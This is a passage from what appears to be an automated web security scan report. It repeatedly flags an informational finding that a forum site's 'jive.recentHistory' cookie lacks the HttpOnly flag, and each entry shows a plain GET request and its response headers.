User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333235323b312c35333334333b312c35333331393b312c35333331323b312c35333037353b312c35333539323b312c35333437393b312c35333631303b312c35333631393b312c35333637393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=105262 t=1313157515804148
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.147. https://www.x.com/message/212001  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212001

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212001 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333331323b312c35333334333b312c35333037353b312c35333331393b312c35333539323b312c35333437393b312c35333631303b312c35333631393b312c35333637393b312c35333632383b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=105378 t=1313157515407297
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.148. https://www.x.com/message/212124  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212124

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212124 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333331393b312c35333334333b312c35333539323b312c35333037353b312c35333437393b312c35333631303b312c35333631393b312c35333637393b312c35333632383b312c35333636373b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=62279 t=1313157514975703
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.149. https://www.x.com/message/212170  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212170

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212170 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333334333b312c35333539323b312c35333437393b312c35333037353b312c35333631303b312c35333631393b312c35333637393b312c35333632383b312c35333636373b312c34353633303b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:34 GMT; Path=/
Vary: User-Agent
JP: D=97085 t=1313157514570063
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.150. https://www.x.com/message/212753  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212753

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212753 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333037353b312c35333437393b312c35333631303b312c35333539323b312c35333631393b312c35333637393b312c35333632383b312c35333636373b312c34353633303b312c35333638373b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:34 GMT; Path=/
Vary: User-Agent
JP: D=168395 t=1313157514196506
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.151. https://www.x.com/message/212906  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212906

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212906 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333437393b312c35333631303b312c35333631393b312c35333637393b312c35333539323b312c35333632383b312c35333636373b312c34353633303b312c35333638373b312c35333731303b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:33 GMT; Path=/
Vary: User-Agent
JP: D=62986 t=1313157513210614
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.152. https://www.x.com/message/213354  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213354

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213354 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333539323b312c35333632383b312c35333631303b312c35333631393b312c35333637393b312c35333636373b312c34353633303b312c35333638373b312c35333731303b312c35333833383b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:32 GMT; Path=/
Vary: User-Agent
JP: D=113506 t=1313157512852345
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.153. https://www.x.com/message/213546  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213546

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213546 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333631303b312c34353633303b312c35333632383b312c35333636373b312c35333631393b312c35333637393b312c35333638373b312c35333731303b312c35333833383b312c35333839393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:32 GMT; Path=/
Vary: User-Agent
JP: D=101383 t=1313157512015652
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.154. https://www.x.com/message/213568  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213568

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213568 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333631393b312c34353633303b312c35333632383b312c35333637393b312c35333636373b312c35333638373b312c35333731303b312c35333833383b312c35333839393b312c35333933353b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=61024 t=1313157511632200
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.155. https://www.x.com/message/213571  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213571

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213571 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333632383b312c34353633303b312c35333638373b312c35333636373b312c35333637393b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=67689 t=1313157511258036
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.156. https://www.x.com/message/213767  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213767

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213767 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333637393b312c35333638373b312c35333636373b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=90276 t=1313157510953739
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.157. https://www.x.com/message/213787  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213787

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213787 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333636373b312c35333638373b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:30 GMT; Path=/
Vary: User-Agent
JP: D=78709 t=1313157510281228
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.158. https://www.x.com/message/213788  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213788

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213788 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333638373b312c35333833383b312c34353633303b312c35333731303b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:29 GMT; Path=/
Vary: User-Agent
JP: D=103606 t=1313157509903054
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.159. https://www.x.com/message/213865  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213865

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213865 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:29 GMT; Path=/
Vary: User-Agent
JP: D=179001 t=1313157509418868
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.160. https://www.x.com/message/214347  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214347

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214347 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333833383b312c35333936313b312c35333933353b312c35333839393b312c35333731303b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:28 GMT; Path=/
Vary: User-Agent
JP: D=78567 t=1313157508050072
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.161. https://www.x.com/message/214440  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214440

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214440 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333731303b312c35333933353b312c35333936313b312c35333833383b312c35333839393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=115134 t=1313157507734977
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.162. https://www.x.com/message/214618  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214618

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214618 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=71895 t=1313157507417708
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.163. https://www.x.com/message/214902  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214902

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214902 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=61141 t=1313157507100954
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.164. https://www.x.com/message/214926  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214926

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214926 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:26 GMT; Path=/
Vary: User-Agent
JP: D=86752 t=1313157506769901
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.165. https://www.x.com/message/215245  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215245

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215245 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
